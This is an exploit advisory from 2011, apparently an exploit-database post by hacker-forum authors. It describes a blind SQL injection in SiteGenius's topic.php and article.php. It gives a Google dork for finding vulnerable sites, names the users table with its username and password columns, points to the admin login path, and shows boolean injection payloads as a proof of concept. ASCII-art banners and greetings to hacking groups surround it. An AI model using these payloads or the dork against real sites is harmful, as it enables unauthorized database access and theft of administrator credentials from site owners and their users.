===================================================== SiteGenius Blind SQL injection vulnerability ===================================================== # Exploit title : SiteGenius Blind SQL injection vulnerability # Date : 02 \ 08 \ 2011 # Author : AutoRUN & dR.sqL # Home : HackForums.AL , AutoRUN-Albania.COM , whiteh4t.net, HackingWith.US , # Software Link : http://www.sitegenius.com # Tested on : Windows XP & Linux # Category : web apps # Google Dork : inurl:"sitegenius/topic.php?id=" # Versions affected : All ---------------------------------- # ~ ExpL0!taTi0N ~ # ---------------------------------- Affected files : topic.php & article.php SQLi (blind) details: Table: users ; Columns: username & password ; Panel (admin): /sitegenius/login.php Exploit : http://localhost/sitegenius/topic.php?id=1 and 1=1 --> TRUE http://localhost/sitegenius/topic.php?id=1 and 1=2 --> FALSE w00t!! Blind SQL injection ! _ _ ____ _ _ _ _ ___ _ ____ _ / \ _ _| |_ ___ | _ \| | | | \ | | ( _ ) __| | _ \ ___ __ _| | / _ \| | | | __/ _ \| |_) | | | | \| | / _ \/\ / _` | |_) | / __|/ _` | | / ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_> < | (_| | _ < _\__ \ (_| | |___ /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \___/\/ \__,_|_| \_(_)___/\__, |_____| |_| # Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , 1Nj3ct0r-4L, AHG , ssgodfather, DJDukli , b4ti , #tupac.al, CroSs HackForums.AL members & All our friends. ____ _ ____ ____ _ _ _ _ _ | _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | | | |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | | | __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_| |_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_) # 2011